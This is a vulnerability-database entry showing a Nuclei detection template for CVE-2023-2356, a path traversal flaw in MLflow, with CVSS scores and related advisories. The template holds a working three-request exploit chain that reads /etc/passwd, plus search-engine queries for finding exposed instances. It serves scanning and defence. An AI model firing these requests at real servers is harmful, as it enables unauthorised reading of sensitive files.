Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-2356HistoryMay 04, 2023 - 12:59 p.m.
Mlflow <2.3.0 - Local File Inclusion
2023-05-0412:59:25
ProjectDiscovery
github.com
10
cve2023
lfi
mlflow
huntr
oss
lfprojects
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7.6
Confidence
High
EPSS
0.012
Percentile
85.7%
Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
id: CVE-2023-2356
info:
name: Mlflow <2.3.0 - Local File Inclusion
author: Co5mos
severity: high
description: |
Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability.
reference:
- https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2356
- https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342
- https://github.com/Ostorlab/KEV
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-2356
cwe-id: CWE-23
epss-score: 0.01406
epss-percentile: 0.86426
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- app="MLflow"
- app="mlflow"
- title="mlflow"
google-query: intitle:"mlflow"
tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{str}}"}
- |
POST /api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
- |
GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- root:[x*]:0:0
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- '"version": "([0-9.]+)",'
internal: true
part: body
# digest: 490a00463044021f0a21f7d206dec98e8f87565781a99fedda197d776617f6d266fe245242061f022100ff34925e4f91bb9951803355f009dfc63d5d727adc5652223c2a61d58e324df5:922c64590222798bb761d5b6d8e72950Related
huntr
huntr
LFI in Model Version REST API creation
2023-04-20 18:40:34
cve
cve
CVE-2023-2356
2023-04-28 00:15:08
nvd
nvd
CVE-2023-2356
2023-04-28 00:15:08
cvelist
cvelist
CVE-2023-2356 Relative Path Traversal in mlflow/mlflow
2023-04-28 00:00:00
veracode
veracode
Path Traversal
2023-05-03 03:54:32
prion
prion
Path traversal
2023-04-28 00:15:00
osv
osv
CVE-2023-2356
2023-04-28 00:15:08
BIT-mlflow-2023-2356
2024-03-06 10:59:06
PYSEC-2023-68
2023-04-28 00:15:00
github
github
Relative path traversal in mlflow
2023-04-28 00:30:29
CVSS3
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
7.6
Confidence
High
EPSS
0.012
Percentile
85.7%
Related for NUCLEI:CVE-2023-2356